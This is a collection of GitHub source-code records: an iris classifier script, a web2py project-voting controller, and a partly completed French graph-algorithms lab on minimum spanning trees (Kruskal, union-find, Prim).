sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.decomposition import PCA\r\n\r\n\r\n#from sklearn.model_selection import train_test_split\r\niris = sklearn.datasets.load_iris()\r\n\r\ndef p(*priI_Inted):\r\n for I_I in priI_Inted:\r\n print(I_I)\r\n\r\n\r\n\r\nclass datapoint:\r\n dt = 0.0\r\n lab = 0.0\r\n\r\n#x_train,x_test,y_train,y_test\r\ndef Split(Data,Labels,testRatio,valRatio):\r\n N = len(Data)\r\n \r\n testSize = int(testRatio*N)\r\n valSize = int(valRatio*N)\r\n allData = []\r\n\r\n \r\n\r\n for i in range(0,N):\r\n x = datapoint()\r\n x.dt = np.array([Data[i][0],Data[i][1],Data[i][2],Data[i][3]],dtype=float)\r\n x.lab = Labels[i]\r\n allData.append(x)\r\n\r\n\r\n random.seed(7)\r\n random.shuffle(allData)\r\n \r\n \r\n trainSize = N - (testSize+valSize)\r\n\r\n\r\n\r\n #p(trainSize)\r\n x_train = np.zeros((trainSize,4),dtype=float)\r\n y_train = np.zeros((trainSize),dtype=int)\r\n \r\n x_val = np.zeros((valSize,4),dtype=float)\r\n y_val = np.zeros((valSize),dtype=int)\r\n\r\n x_test = np.zeros((testSize,4),dtype=float)\r\n y_test = np.zeros((testSize),dtype=int)\r\n \r\n i = 0\r\n c = 0\r\n while i < testSize:\r\n x_test[c] = allData[i].dt\r\n y_test[c] = allData[i].lab\r\n i = i + 1\r\n c = c + 1\r\n\r\n c = 0\r\n while i < testSize + valSize:\r\n x_val[c] = allData[i].dt\r\n y_val[c] = allData[i].lab\r\n i = i + 1\r\n c = c + 1\r\n\r\n c = 0\r\n while i < N:\r\n x_train[c] = allData[i].dt\r\n y_train[c] = allData[i].lab\r\n i = i + 1\r\n c = c + 1\r\n return x_train,x_test,x_val,y_val,y_train,y_test\r\n\r\n\r\ndef calculate_accuracy(predicted_y , y):\r\n sum = 0\r\n l = len(y)\r\n for i in range(0,l):\r\n if predicted_y[i] == y[i]: \r\n sum += 1\r\n\r\n return float(100*sum/l)\r\n \r\n\r\nData = iris.data\r\nLabels = iris.target\r\n\r\n\r\n\r\nx_train,x_test,x_val,y_val,y_train,y_test = Split(Data,Labels,0.30,0.30)\r\n\r\n\r\nclf = GaussianNB()\r\n\r\nclf.fit(x_train,y_train)\r\n\r\n\r\npredicted_y = clf.predict(x_test)\r\n\r\naccuracy = calculate_accuracy(predicted_y,y_test)\r\n\r\n\r\np(accuracy)\r\n\r\n\r\n \r\npca = PCA(n_components=2)\r\n\r\n\r\nxx = pca.fit_transform(x_train)\r\nclf.fit(xx,y_train)\r\npl.plot_decision_regions(xx, y_train, clf=clf)\r\nplt.show()","repo_name":"abdallahMohsen3162/machine-learning","sub_path":"classification/iris prediction.py","file_name":"iris prediction.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18071596183","text":"# -*- coding: utf-8 -*-\n# -------------------------------------------------------------------------\n# This is a sample controller\n# this file is released under public domain and you can use without limitations\n# -------------------------------------------------------------------------\n\n# ---- example index page ----\ndef index():\n projects = db(Project).select()\n\n return dict(projects=projects)\n\n\n@auth.requires_login()\ndef proj_detail():\n projId = request.args[0]\n projData = db(Project.id == projId).select().first()\n you_vote = db((Vote.project == projId)&(Vote.created_by == auth.user_id)&(Vote.vote != None)).select(Vote.id, Vote.vote).first()\n y_vote = db((Vote.project == projId)&(Vote.vote == True)).count()\n n_vote = db((Vote.project == projId)&(Vote.vote == False)).count()\n\n return dict(projData=projData, you_vote=you_vote,\n y_vote=y_vote, n_vote=n_vote,\n )\n\n\n@auth.requires_login()\ndef yes_vote():\n projId = request.args[0]\n Vote.update_or_insert((Vote.project==projId)&(Vote.created_by==auth.user_id),\n project=projId, vote=True)\n session.flash = 'Você votou Sim!'\n redirect(URL('default', 'proj_detail', args=projId))\n\n\n@auth.requires_login()\ndef no_vote():\n projId = request.args[0]\n Vote.update_or_insert((Vote.project==projId)&(Vote.created_by==auth.user_id),\n project=projId, vote=False)\n session.flash = 'Você votou Não!'\n redirect(URL('default', 'proj_detail', args=projId))\n\n\n@auth.requires_login()\ndef neutral_vote():\n voteId = request.args[0]\n projId = request.args[1]\n db((Vote.id==voteId)&(Vote.created_by==auth.user_id)).update(vote=None)\n redirect(URL('default', 'proj_detail', args=projId))\n\n\n# ---- API (example) -----\n@auth.requires_login()\ndef api_get_user_email():\n if not request.env.request_method == 'GET': raise HTTP(403)\n return response.json({'status':'success', 'email':auth.user.email})\n\n\n# ---- Smart Grid (example) -----\n# @auth.requires_membership('admin') # can only be accessed by members of admin groupd\ndef grid():\n response.view = 'generic.html' # use a generic view\n tablename = request.args(0)\n if not tablename in db.tables: raise HTTP(403)\n grid = SQLFORM.smartgrid(db[tablename], args=[tablename], deletable=False, editable=False)\n return dict(grid=grid)\n\n\n# ---- Embedded wiki (example) ----\ndef wiki():\n auth.wikimenu() # add the wiki to the menu\n return auth.wiki() \n\n\n# ---- Action for login/register/etc (required for auth) -----\ndef user():\n \"\"\"\n exposes:\n http://..../[app]/default/user/login\n http://..../[app]/default/user/logout\n http://..../[app]/default/user/register\n http://..../[app]/default/user/profile\n http://..../[app]/default/user/retrieve_password\n http://..../[app]/default/user/change_password\n http://..../[app]/default/user/bulk_register\n use @auth.requires_login()\n @auth.requires_membership('group name')\n @auth.requires_permission('read','table name',record_id)\n to decorate functions that need access control\n also notice there is http://..../[app]/appadmin/manage/auth to allow administrator to manage users\n \"\"\"\n return dict(form=auth())\n\n\n# ---- action to server uploaded static content (required) ---\n@cache.action()\ndef download():\n \"\"\"\n allows downloading of uploaded files\n http://..../[app]/default/download/[filename]\n \"\"\"\n return response.download(request, db)\n","repo_name":"volneyrock/VisaoParlamentar","sub_path":"controllers/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72517987680","text":"'''\nAuthor: ThearchyHelios\nDate: 2022-10-18 13:34:31\nLastEditTime: 2022-11-04 18:17:27\nLastEditors: ThearchyHelios\nDescription: \nFilePath: /INF303/TP3/tp.py\n'''\n###############################################\n### TP3 - Arbres couvrants de poids minimum ###\n###############################################\n\nimport copy\nimport time\nfrom lib.graphe import Graphe\nfrom lib.tasbinomial import TasBinomial\n\n\"\"\"\nLes fonctions dont la documentation contient OBLIGATOIRE sont nécessaires pour\navoir le point du TP. Les exemples donnés servent aussi de tests unitaires si\nle fichier est exécuté.\n\nComment faire les TP :\n* Téléchargez et décompressez l'archive du TP.\n* Ouvrez le fichier « tp.py » dans votre éditeur de texte favori.\n### À COMPLÉTER DÉBUT » (0 ligne(s))\n* Complétez une par une les fonctions entre les lignes «\n\net « ### À COMPLÉTER FIN »\n* Lorsque vous pensez avoir terminé une fonction, exécutez le fichier sur votre\nmachine et vérifiez que les tests unitaires passent. Si ce n'est pas le cas,\ncorrigez votre fonction.\n* Lorsque les tests unitaires passent pour une fonction, faites un\ncopier-coller du fichier complet sur Caseine dans l'onglet \"Edit\", sauvegardez\net vérifiez que cela fonctionne sur Caseine avec le bouton \"Evaluate\".\n\nPour toute remarque sur le TP en lui-même (indications pas suffisamment\nclaires, bug, code qui fonctionne en local mais pas sur Caseine, jeux de tests\ninsuffisants, questions intéressantes à ajouter, orthographe...), contactez\nFlorian Fontan florian.fontan@grenoble-inp.fr\n\nAttention : les tests fournis ne peuvent être exhaustifs. Qu'une fonction passe\ntous les tests ne garantie pas qu'elle soit correcte. Gardez cela en tête\nlorsque vous réutilisez vos fonctions dans d'autres fonctions.\n\n---\n\nDans ce TP, les graphes sont des graphes avec des poids sur les arêtes.\nPensez à regarder les documentations et exemples de la classe Graphe,\nnotamment pour les méthodes __init__, ajouter_arete et voisins_avec_poids.\n\"\"\"\n\n\n#####################################\n### Algorithme de Kruskal inversé ###\n#####################################\n\ndef graphe_1():\n \"\"\"Retourne le graphe (Graphe) G1.\n\n -------------------\n --- OBLIGATOIRE ---\n -------------------\n\n 2\n /|\n / |\n / |\n 2 / | 3 G1\n / |\n / |\n / |\n 0-------1-------3\n 1 4\n\n :Examples:\n\n >>> graphe_1()\n {4: 0-1-1 0-2-2 1-3-2 1-4-3}\n\n \"\"\"\n\n # À COMPLÉTER DÉBUT (1 ligne(s))\n return Graphe(4, [(0, 1, 1), (0, 2, 2), (1, 2, 3), (1, 3, 4)])\n\n # À COMPLÉTER FIN\n\n\ndef graphe_2():\n \"\"\"Retourne le graphe (Graphe) G2.\n\n -------------------\n --- OBLIGATOIRE ---\n -------------------\n\n 11\n 0--------1\n |\\ /|\n | \\10 9/ |\n | \\ / |\n | \\/ |\n |1 /\\ 4| G2\n | / \\ |\n | / \\ |\n |/ \\|\n 2--------3\n 3\n\n :Examples:\n\n >>> graphe_2()\n {4: 0-11-1 0-1-2 0-10-3 1-9-2 1-4-3 2-3-3}\n\n \"\"\"\n\n # À COMPLÉTER DÉBUT (1 ligne(s))\n return Graphe(4, [(0, 1, 11), (0, 2, 1), (0, 3, 10), (1, 2, 9), (1, 3, 4), (2, 3, 3)])\n # À COMPLÉTER FIN\n\n\ndef graphe_3(n):\n \"\"\"Retourne un graphe à n sommet, tel qu'il existe une arête entre i et j si\n et seulement si |j-i| <= 2 et le poids de l'arête (ij) est i+j.\n\n -------------------\n --- OBLIGATOIRE ---\n -------------------\n\n 4\n 1-------3-----\n / \\ / \\\n 1/ 3\\ 5/ 7\\ etc G3\n / \\ / \\ /\n 0-------2-------4\n 2 6\n\n :param n: Nombre de sommets, entier naturel supérieur ou égal à 3\n\n :Examples:\n\n >>> graphe_3(3)\n {3: 0-1-1 0-2-2 1-3-2}\n >>> graphe_3(4)\n {4: 0-1-1 0-2-2 1-3-2 1-4-3 2-5-3}\n >>> graphe_3(5)\n {5: 0-1-1 0-2-2 1-3-2 1-4-3 2-5-3 2-6-4 3-7-4}\n\n \"\"\"\n\n # À COMPLÉTER DÉBUT (6 ligne(s))\n graphe_3_aux = Graphe(n)\n for i in range(n):\n for j in range(i+1, n):\n if abs(i-j) <= 2:\n graphe_3_aux.ajouter_arete(i, j, i+j)\n return graphe_3_aux\n # À COMPLÉTER FIN\n\n\ndef aretes_triees(g: Graphe):\n \"\"\"Retourne la liste des arêtes de g triées par poids croissant.\n\n Les arêtes (uv) sont tel que u < v.\n\n -------------------\n --- OBLIGATOIRE ---\n -------------------\n\n :Examples:\n\n >>> aretes_triees(graphe_1())\n [(0, 1, 1), (0, 2, 2), (1, 2, 3), (1, 3, 4)]\n >>> aretes_triees(graphe_2())\n [(0, 2, 1), (2, 3, 3), (1, 3, 4), (1, 2, 9), (0, 3, 10), (0, 1, 11)]\n\n\n \"\"\"\n\n # Pour trier une liste l de tuples selon leur ieme composante :\n # >>> l.sort(key=lambda t: t[i])\n\n # À COMPLÉTER DÉBUT (7 ligne(s))\n aretes = []\n for u in range(g.nombre_sommets()):\n for v, p in g.voisins_avec_poids(u):\n if u < v:\n aretes.append((u, v, p))\n aretes.sort(key=lambda t: t[2])\n return aretes\n # À COMPLÉTER FIN\n\n\ndef est_connexe(g: Graphe):\n \"\"\"Retourne True si g est connexe, False sinon.\n\n -------------------\n --- OBLIGATOIRE ---\n -------------------\n\n :param g: Un graphe (Graphe)\n\n :Examples:\n\n >>> est_connexe(graphe_1())\n True\n >>> est_connexe(graphe_2())\n True\n >>> est_connexe(Graphe(1))\n True\n >>> est_connexe(Graphe(6, [(0, 1), (1, 2), (2, 3), (3, 4), (4, 5)]))\n True\n >>> est_connexe(Graphe(6, [(0, 1), (1, 2), (2, 3), (3, 4), (3, 5), (4, 5)]))\n True\n >>> est_connexe(Graphe(2))\n False\n >>> est_connexe(Graphe(5))\n False\n >>> est_connexe(Graphe(4, [(0, 1), (2, 3)]))\n False\n >>> est_connexe(Graphe(5, [(0, 1), (1, 2), (2, 3)]))\n False\n >>> est_connexe(Graphe(5, [(i, j) for i in range(0, 4) for j in range(i+1, 4)]))\n False\n >>> est_connexe(Graphe(6, [(i, j) for i in range(0, 5) for j in range(i+1, 5)]))\n False\n >>> est_connexe(Graphe(6, [(0, 1), (0, 2), (1, 2), (3, 4), (4, 5), (3, 5)]))\n False\n >>> est_connexe(Graphe(8,\n ... [(i, j) for i in range(0, 4) for j in range(i+1, 4)] +\n ... [(i, j) for i in range(4, 8) for j in range(i+1, 8)]))\n ...\n False\n\n \"\"\"\n\n # Si vous aviez déjà implémenté cette fonction au TP précédent, vous pouvez\n # réutiliser votre code.\n\n # À COMPLÉTER DÉBUT (12 ligne(s))\n def est_connexe(g, c, u):\n for v in g.voisins(u):\n if v not in c:\n c.append(v)\n est_connexe(g, c, v)\n if len(c) == g.nombre_sommets():\n return True\n return False\n\n u = 0\n c = [u]\n return est_connexe(g, c, u)\n\n # À COMPLÉTER FIN\n\n\ndef kruskal_inverse(g: Graphe):\n \"\"\"Retourne un arbre couvrant de poids minimum du graphe g en utilisant\n l'algorithme de Kruskal inverse.\n\n -------------------\n --- OBLIGATOIRE ---\n -------------------\n\n :param g: un graphe (Graphe) connexe\n :return: un couple (t, l) où\n * t est un arbre (Graphe) couvrant de poids minimum de g\n * l est la liste telle que l[i] est l'arête retirée à l'itération i\n (None si aucune arête n'est retirée)\n\n :Examples:\n\n >>> kruskal_inverse(graphe_1())\n ({4: 0-1-1 0-2-2 1-4-3}, [None, (1, 2)])\n >>> kruskal_inverse(graphe_2())\n ({4: 0-1-2 1-4-3 2-3-3}, [(0, 1), (0, 3), (1, 2)])\n >>> kruskal_inverse(graphe_3(4))\n ({4: 0-1-1 0-2-2 1-4-3}, [(2, 3), None, (1, 2)])\n >>> kruskal_inverse(graphe_3(5))\n ({5: 0-1-1 0-2-2 1-4-3 2-6-4}, [(3, 4), None, (2, 3), None, (1, 2)])\n\n \"\"\"\n\n n = g.nombre_sommets()\n t = copy.copy(g)\n l = []\n ### À COMPLÉTER DÉBUT (10 ligne(s))\n aretes = aretes_triees(t)\n aretes.reverse()\n for u, v, poids in aretes:\n t.supprimer_arete(u, v)\n if not est_connexe(t):\n t.ajouter_arete(u, v, poids)\n if t.nombre_aretes() != n-1:\n l.append(None)\n else:\n l.append((u, v))\n return t, l\n\n # À COMPLÉTER FIN\n\n\n#############################\n### Algorithme de Kruskal ###\n#############################\n\n########################################################\n### Union-Find : Implémentation utilisant un tableau ###\n########################################################\n\n# Pour implémenter la version classique de l'algorithme de Kruskal, nous allons\n# utiliser une structure UNION-FIND que nous allons implémenter.\n# On numérote les composantes connexes de la forêt courante. Au début de\n# l'algorithme, comme il n'y a pas encore d'arête, chaque sommet est seul dans\n# sa composante connexe. Si lorsque l'on examine l'arête (uv), u et v\n# appartiennent à la même composante connexe, alors on n'ajoute pas l'arête,\n# sinon on l'ajoute et on met à jour notre structure pour fusionner les\n# composantes connexes de u et de v.\n\n# Pour la première implémentation de la structure UNION-FIND, nous allons\n# utiliser un tableau T (une liste en Python) tel que T[i] est l'indice de la\n# composante connexe à laquelle le sommet i appartient.\n\ndef ufl_creer(n):\n \"\"\"Retourne la structure UNION-FIND initialisée.\n\n -------------------\n --- OBLIGATOIRE ---\n -------------------\n\n :param n: Nombre de sommets, entier naturel\n\n :Examples:\n\n >>> ufl_creer(2)\n [0, 1]\n >>> ufl_creer(5)\n [0, 1, 2, 3, 4]\n\n \"\"\"\n\n # À COMPLÉTER DÉBUT (1 ligne(s))\n return [i for i in range(n)]\n # À COMPLÉTER FIN\n\n\ndef ufl_find(l, v):\n \"\"\"Retourne l'indice de la composante connexe du sommet i dans la structure\n UNION-FIND l.\n\n -------------------\n --- OBLIGATOIRE ---\n -------------------\n\n :param v: Un indice d'un sommet, entier naturel compris entre 0 et n-1.\n\n :Examples:\n\n >>> l = [0, 0, 1, 0, 2, 3, 4]\n >>> ufl_find(l, 1)\n 0\n >>> ufl_find(l, 6)\n 4\n\n \"\"\"\n\n # À COMPLÉTER DÉBUT (1 ligne(s))\n return l[v]\n # À COMPLÉTER FIN\n\n\ndef ufl_union(l, i, j):\n \"\"\"Fusionne les composantes connexes d'indice i et j dans la structure\n UNION-FIND l.\n\n L'indice de la nouvelle composante connexe est min(i,j).\n\n -------------------\n --- OBLIGATOIRE ---\n -------------------\n\n :param i: Un indice d'une composante connexe, i in l\n :param j: Un indice d'une composante connexe, j in l, j != i\n\n :Examples:\n\n >>> l = [0, 0, 1, 0, 2, 4, 4]\n >>> ufl_union(l, 1, 0)\n >>> l\n [0, 0, 0, 0, 2, 4, 4]\n >>> ufl_union(l, 4, 2)\n >>> l\n [0, 0, 0, 0, 2, 2, 2]\n\n \"\"\"\n\n # À COMPLÉTER DÉBUT (3 ligne(s))\n if i > j:\n i, j = j, i\n for k in range(len(l)):\n if l[k] == j:\n l[k] = i\n # À COMPLÉTER FIN\n\n\ndef kruskal_ufl(g: Graphe):\n \"\"\"Retourne un arbre couvrant de poids minimum du graphe g en utilisant\n l'algorithme de Kruskal avec la structure UNION-FIND utilisant un tableau.\n\n -------------------\n --- OBLIGATOIRE ---\n -------------------\n\n :param g: un graphe (Graphe) connexe\n :return: un couple (t, l) où\n * t est un arbre (Graphe) couvrant de poids minimum de g\n * l est la liste telle que l[i] est l'arête ajoutée à l'itération i\n (None si aucune arête n'est ajoutée)\n\n :Examples:\n\n >>> kruskal_ufl(graphe_1())\n ({4: 0-1-1 0-2-2 1-4-3}, [(0, 1), (0, 2), None, (1, 3)])\n >>> kruskal_ufl(graphe_2())\n ({4: 0-1-2 1-4-3 2-3-3}, [(0, 2), (2, 3), (1, 3)])\n >>> kruskal_ufl(graphe_3(4))\n ({4: 0-1-1 0-2-2 1-4-3}, [(0, 1), (0, 2), None, (1, 3)])\n >>> kruskal_ufl(graphe_3(5))\n ({5: 0-1-1 0-2-2 1-4-3 2-6-4}, [(0, 1), (0, 2), None, (1, 3), None, (2, 4)])\n\n \"\"\"\n\n n = g.nombre_sommets()\n t = Graphe(n)\n uf = ufl_creer(n)\n l = []\n\n # À COMPLÉTER DÉBUT (13 ligne(s))\n aretes = aretes_triees(g)\n # aretes.reverse()\n for u, v , poids in aretes:\n i = ufl_find(uf, u)\n j = ufl_find(uf, v)\n if i != j:\n t.ajouter_arete(u, v, poids)\n l.append((u, v))\n ufl_union(uf, i, j)\n else:\n l.append(None)\n while l[-1] == None:\n l.pop()\n return t, l\n\n # À COMPLÉTER FIN\n\n\n########################################################\n### Union-Find : Implémentation utilisant des forêts ###\n########################################################\n\n# Essayons de lancer l'algorithme écrit précédemment sur un graphe avec un\n# nombre élevé de sommets.\n# Décommentez les lignes suivantes et exécutez votre programme :\n\n\"\"\"\nt0 = time.time()\n\nkruskal_ufl(graphe_3(4096)) # 0.62s sur ma machine (Intel Core i5)\nt1 = time.time()\nprint(\"KRUSKAL_UFL: \", round(t1-t0, 2), \"s\", sep=\"\")\n\nquit()\n\"\"\"\n\n# (Vous pouvez ensuite les commenter à novueau)\n# On constate qu'il faut plus d'une demi-seconde pour que l'algorithme se\n# termine. En fait, ce sont les appels à la fonction union qui prennent le plus\n# de temps lors de l'exécution. En effet, lors de l'appel de cette fonction, il\n# faut parcourir la liste en entier. Dans l'implémentation suivante, cette\n# fonction ne demande que log(n) opérations, voire moins (en contrepartie, la\n# fonction find demandera quant à elle un peu plus d'opérations aussi).\n# Pour les détails, lisez l'article consacré sur Wikipédia :\n# https://fr.wikipedia.org/wiki/Union-find#Impl%C3%A9mentation_utilisant_des_for%C3%AAts\n# Pensez à bien implémenter toutes les optimisations proposées.\n\n\ndef uff_creer(n):\n \"\"\"Retourne la structure UNION-FIND initialisée.\n\n La structure est une liste de n couples tel que le premier élément du\n couple i indique le parent de l'élément i (ou i si l'élément est la\n racine), et si l'élément i est la racine, le second élément indique le\n rang de l'ensemble i.\n\n :param n: Nombre de sommets, entier naturel\n\n :Examples:\n\n >>> uff_creer(2)\n [[0, 0], [1, 0]]\n >>> uff_creer(5)\n [[0, 0], [1, 0], [2, 0], [3, 0], [4, 0]]\n\n \"\"\"\n\n # À COMPLÉTER DÉBUT (1 ligne(s))\n return [[i, 0] for i in range(n)]\n\n # À COMPLÉTER FIN\n\n\ndef uff_find(l, v):\n \"\"\"Retourne l'indice de la composante connexe du sommet i dans la structure\n UNION-FIND l.\n\n Implémente la compression de chemin comme illustré dans les exemples\n ci-dessous.\n\n :param v: Un indice d'un sommet, entier naturel compris entre 0 et n-1.\n\n :Examples:\n\n 0(3)\n / | \\\n / | \\\n / | \\\n 1(0) 2(1) 4(2)\n | | \\\n | | \\\n | | \\\n 3(0) 5(0) 6(1)\n |\n |\n |\n 7(0)\n\n >>> l = [[0, 3], [0, 0], [0, 1], [2, 0], [0, 2], [4, 0], [4, 1], [6, 0]]\n >>> uff_find(l, 0)\n 0\n >>> l # non modifiée\n [[0, 3], [0, 0], [0, 1], [2, 0], [0, 2], [4, 0], [4, 1], [6, 0]]\n\n >>> uff_find(l, 1)\n 0\n >>> l # non modifiée\n [[0, 3], [0, 0], [0, 1], [2, 0], [0, 2], [4, 0], [4, 1], [6, 0]]\n\n >>> uff_find(l, 4)\n 0\n >>> l # non modifiée\n [[0, 3], [0, 0], [0, 1], [2, 0], [0, 2], [4, 0], [4, 1], [6, 0]]\n\n >>> uff_find(l, 3)\n 0\n >>> l # Le nœud 3 n'est plus fils du nœud 2 mais de la racine 0.\n [[0, 3], [0, 0], [0, 1], [0, 0], [0, 2], [4, 0], [4, 1], [6, 0]]\n\n 0(3)\n .\n .\n .\n 1(0) 2(1) 3(0) 4(2)\n | \\\n | \\\n | \\\n 5(0) 6(1)\n |\n |\n |\n 7(0)\n\n >>> uff_find(l, 7)\n 0\n >>> l # Les nœud 6 et 7 deviennent des fils de la racine.\n [[0, 3], [0, 0], [0, 1], [0, 0], [0, 2], [4, 0], [0, 1], [0, 0]]\n\n 0(3)\n .\n .\n .\n 1(0) 2(1) 3(0) 4(2) 6(1) 7(0)\n |\n |\n |\n 5(0)\n\n\n \"\"\"\n\n # À COMPLÉTER DÉBUT (3 ligne(s))\n if l[v][0] != v:\n l[v][0] = uff_find(l, l[v][0])\n return l[v][0]\n\n # À COMPLÉTER FIN\n\n\ndef uff_union(l, i, j):\n \"\"\"Fusionne les composantes connexes d'indice i et j dans la structure\n UNION-FIND l.\n\n Si les composantes d'indice i et j ont même rang, alors la racine\n de l'union est la racine de i.\n\n :param i: Un indice d'une composante connexe, i in l\n :param j: Un indice d'une composante connexe, j in l, j != i\n\n :Examples:\n\n rang(i) != rang(j)\n\n 1(1) 2(0) 1(1)\n | -> / \\\n | / \\\n 0(0) 0(1) 2(0)\n\n >>> l = [[1, 0], [1, 1], [2, 0]]\n >>> uff_union(l, 1, 2)\n >>> l\n [[1, 0], [1, 1], [1, 0]]\n\n 2(1) 1(0) 2(1)\n | -> / \\\n | / \\\n 0(0) 0(1) 1(0)\n\n >>> l = [[2, 0], [1, 0], [2, 1]]\n >>> uff_union(l, 1, 2)\n >>> l\n [[2, 0], [2, 0], [2, 1]]\n\n rang(i) == rang(j)\n\n 1(1) 2(1) uff_union(1, 2) 1(2)\n | | -> / \\\n | | / \\\n 0(0) 3(0) 0(0) 2(1)\n |\n |\n 3(0)\n\n >>> l = [[1, 0], [1, 1], [2, 1], [2, 0]]\n >>> uff_union(l, 1, 2)\n >>> l\n [[1, 0], [1, 2], [1, 1], [2, 0]]\n\n 1(1) 2(1) uff_union(2, 1) 2(2)\n | | -> / \\\n | | / \\\n 0(0) 3(0) 3(0) 1(1)\n |\n |\n 0(0)\n\n >>> l = [[1, 0], [1, 1], [2, 1], [2, 0]]\n >>> uff_union(l, 2, 1)\n >>> l\n [[1, 0], [2, 1], [2, 2], [2, 0]]\n\n \"\"\"\n\n ri = l[i][1]\n rj = l[j][1]\n\n # À COMPLÉTER DÉBUT (7 ligne(s))\n if ri > rj:\n l[j][0] = i\n elif ri < rj:\n l[i][0] = j\n else:\n l[j][0] = i\n l[i][1] += 1\n\n # À COMPLÉTER FIN\n\n\ndef kruskal_uff(g: Graphe):\n \"\"\"Retourne un arbre couvrant de poids minimum du graphe g en utilisant\n l'algorithme de Kruskal avec la structure UNION-FIND utilisant des forêts.\n\n :param g: un graphe (Graphe) connexe\n :return: un couple (t, l) où\n * t est un arbre (Graphe) couvrant de poids minimum de g\n * l est la liste telle que l[i] est l'arête ajoutée à l'itération i\n (None si aucune arête n'est ajoutée)\n\n :Examples:\n\n >>> kruskal_uff(graphe_1())\n ({4: 0-1-1 0-2-2 1-4-3}, [(0, 1), (0, 2), None, (1, 3)])\n >>> kruskal_uff(graphe_2())\n ({4: 0-1-2 1-4-3 2-3-3}, [(0, 2), (2, 3), (1, 3)])\n >>> kruskal_uff(graphe_3(4))\n ({4: 0-1-1 0-2-2 1-4-3}, [(0, 1), (0, 2), None, (1, 3)])\n >>> kruskal_uff(graphe_3(5))\n ({5: 0-1-1 0-2-2 1-4-3 2-6-4}, [(0, 1), (0, 2), None, (1, 3), None, (2, 4)])\n >>> kruskal_uff(Graphe(7, [(0, 1, 1), (1, 2, 2), (3, 4, 3), (2, 4, 4), (0, 2, 5), (3, 5, 7), (0, 5, 6), (0, 6, 10)]))\n ({7: 0-1-1 0-6-5 0-10-6 1-2-2 2-4-4 3-3-4}, [(0, 1), (1, 2), (3, 4), (2, 4), None, (0, 5), None, (0, 6)])\n\n \"\"\"\n\n n = g.nombre_sommets()\n uf = uff_creer(n)\n t = Graphe(n)\n l = []\n\n # À COMPLÉTER DÉBUT (13 ligne(s))\n aretes = aretes_triees(g)\n for u, v, poid in aretes:\n if uff_find(uf, u) != uff_find(uf, v):\n t.ajouter_arete(u, v, poid)\n uff_union(uf, u, v)\n l.append((u, v))\n else:\n l.append(None)\n\n # À COMPLÉTER FIN\n\n return (t, l)\n\n# Décommentez les lignes suivantes pour comparer la différence de temps\n# d'exécution entre les deux implémentations de la structure UNION-FIND:\n\n\n\"\"\"\nt0 = time.time()\nn = 4096\ng = graphe_3(n)\n\nkruskal_ufl(g) # 0.62s sur ma machine (Intel Core i5)\nt1 = time.time()\nprint(\"KRUSKAL_UFL: \", round(t1-t0, 2), \"s\", sep=\"\")\n\nkruskal_uff(g) # 0.13s sur ma machine (Intel Core i5)\nt2 = time.time()\nprint(\"KRUSKAL_UFF: \", round(t2-t1, 2), \"s\", sep=\"\")\n\nquit()\n\"\"\"\n\n\n##########################\n### Algorithme de Prim ###\n##########################\n\n# Le pseudo-code de l'algorithme de Prim se trouve sur Wikipédia :\n# https://fr.wikipedia.org/wiki/Algorithme_de_Prim\n# Son implémentation requiert l'utilisation d'une structure de file de\n# priorité. Il ne vous est pas demandé d'implémenter une telle structure pour\n# ce TP (mais ça le sera pour le TP suivant :) ). Ici, vous pouvez utiliser la\n# classe TasBinomial qui vous est fournie et s'utilise ainsi :\n\n# Créer une file de priorité contenant des éléments indicés de 0 à n-1 :\n# >>> f = TasBinomial(n)\n# Ajouter un élément v de cout c ou mettre à jour son cout s'il est déjà dans\n# la file :\n# >>> f.ajouter(v, c)\n# Retirer l'élément de cout minimum :\n# >>> v, cv = f.retirer()\n# Obtenir le cout de l'élément d'indice v (retourne float('inf') si v n'est pas\n# dans la file) :\n# >>> c = f.cout(v)\n# Pour savoir si la file est vide :\n# >>> f.est_vide()\n\ndef prim(g):\n \"\"\"Retourne un arbre couvrant de poids minimum du graphe g en utilisant\n l'algorithme de Prim.\n\n Le sommet de départ est le sommet d'indice 0.\n\n :param g: un graphe (Graphe) connexe\n :return: un couple (t, l) où\n * t est un arbre (Graphe) couvrant de poids minimum de g\n * l est une liste telle que l[u] est l'itération à laquelle le sommet u\n a été traité.\n\n :Examples:\n\n >>> prim(graphe_1())\n ({4: 0-1-1 0-2-2 1-4-3}, [0, 1, 2, 3])\n >>> prim(graphe_2())\n ({4: 0-1-2 1-4-3 2-3-3}, [0, 3, 1, 2])\n >>> prim(graphe_3(4))\n ({4: 0-1-1 0-2-2 1-4-3}, [0, 1, 2, 3])\n >>> prim(graphe_3(5))\n ({5: 0-1-1 0-2-2 1-4-3 2-6-4}, [0, 1, 2, 3, 4])\n\n \"\"\"\n\n # Petite astuce pour économiser une ligne :\n # >>> it = iter(range(n))\n # >>> next(it)\n # 0\n # >>> next(it)\n # 1\n # ...\n\n n = g.nombre_sommets()\n pred = [None]*n\n l = [None]*n # l[v] == None <=> v n'a pas encore été ajouté\n t = Graphe(n)\n f = TasBinomial(n)\n it = iter(range(n))\n\n # À COMPLÉTER DÉBUT (10 ligne(s))\n\n # À COMPLÉTER FIN\n\n return (t, l)\n\n\ndef graphe_4(n):\n \"\"\"Retourne le graphe G4 à n+2 sommet, tel que le sous-graphe induit par les\n n premiers sommets est complet avec un poids de 2 sur chaque arête, et G4\n contient les arêtes (0,n) avec un poids de 1 et (0,n+1) avec un poids de 3.\n\n :param n: Nombre de sommets, entier naturel non nul\n\n n\n \\ /2\n 3\\ /\n \\ / 2\n 0---- ...\n / \\\n 1/ \\\n / \\2\n n+1\n\n :Examples:\n\n >>> graphe_4(1)\n {3: 0-1-1 0-3-2}\n >>> graphe_4(2)\n {4: 0-2-1 0-1-2 0-3-3}\n >>> graphe_4(3)\n {5: 0-2-1 0-2-2 0-1-3 0-3-4 1-2-2}\n\n \"\"\"\n\n g = Graphe(n+2)\n for u in range(n):\n for v in range(u+1, n):\n g.ajouter_arete(u, v, 2)\n g.ajouter_arete(0, n, 1)\n g.ajouter_arete(0, n+1, 3)\n return g\n\n# Décommentez les lignes suivantes pour comparer la différence de temps\n# d'exécution entre les différents algorithmes implémentés.\n# Quelques résultats à noter :\n# * L'algorithme de Kruskal inversé est toujours beaucoup plus lent que les\n# autres algorithmes.\n# * L'algorithme de Prim est le plus efficace sur les graphes denses, comme\n# G4(n). Il 